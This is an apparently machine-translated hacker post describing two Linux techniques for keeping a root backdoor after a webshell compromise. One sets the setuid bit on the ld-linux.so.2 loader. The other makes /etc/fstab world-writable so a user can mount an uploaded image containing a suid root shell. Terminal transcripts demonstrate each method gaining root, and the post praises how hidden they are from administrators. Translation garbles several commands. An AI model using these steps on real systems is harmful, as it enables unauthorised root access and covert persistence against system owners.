Privilege Escalation and backdoor retention in LINUX in webshell

Method 1: the setuid method is actually very hidden. Look at the process:

[Root @ localdomain lib] # ls-l | grep ld-linux
Lrwxrwxrwx 1 root 9 ld-linux.so.2-> ld-2.7.so
Lrwxrwxrwx 1 root 13 ld-lsb.so.3-> ld-linux.so.2
[Root @ localdomain lib] # chmod + s ld-linux.so.2
[Root @ localdomain lib] # ls-l | grep ld-2.7.so
-Rwsr-sr-x 1 root 128952 ld-2.7.so
Lrwxrwxrwx 1 root 9 ld-linux.so.2-> ld-2.7.so
[Root @ localdomain lib] #
Here we add the setuid attribute to the/lib/ld-linux.so.2 file (which points to the ld-2.7.so file in FC8. Then we can see how to use it.

Normal user login, test permissions:

[Xiaoyu @ localdomain ~] $ Whoami
Xiaoyu
[Xiaoyu @ localdomain ~] $/Lib/ld-linux.so.2 'which whoam'
Root
[Xiaoyu @ localdomain ~] $
Well, hey, root. How to generate the root shell? You can think about it yourself. Don't be too thorough in everything, right. Haha, you can be certain,/lib/ld-linux.so.2/bin/sh certainly cannot generate rootshell, bash check euid and uid, to see whether it is equal... OK, not much said.

Method 2:

View process:

[Root @ localdomain etc] # chmod a + w/etc/fstab
[Root @ localdomain etc] #

This will be retained. This method is compared to XXOXX, and it is estimated that few administrators know it. Demo using methods

[Xiaoyu @ localdomain ~] $ Ls-l/etc/fstab
-Rw-1 root 456/etc/fstab
[Xiaoyu @ localdomain ~] $ Echo test/mnt ext2 user, suid, exec, loop 0 0>/etc/fstab

Then, upload a file from the local machine to the target machine. Here we name it test.

[Xiaoyu @ localdomain tmp] $ ls-l test
-Rw-r -- 1 xiaoyu 102400 2008-04-20 test
[Xiaoyu @ localdomain tmp] $ mount test
[Xiaoyu @ localdomain tmp] $ cd/mnt
[Xiaoyu @ localdomain mnt] $ ls-l
Total 18
Drwx ------ 2 root 12288 2008-04-20 05:44 lost + found
-Rwsr-sr-x 1 root 4927 2008-04-20 05:44 root
[Xiaoyu @ localdomain mnt] $./root
Sh-3.2 #
Now, we can see that it has been upgraded from common users to root users. Haha.
Test this file baidu seems to have the upload function.

It seems that some people may say that the local backdoor is used by the hacker, but you have to figure it out: A webshell can complete all this ....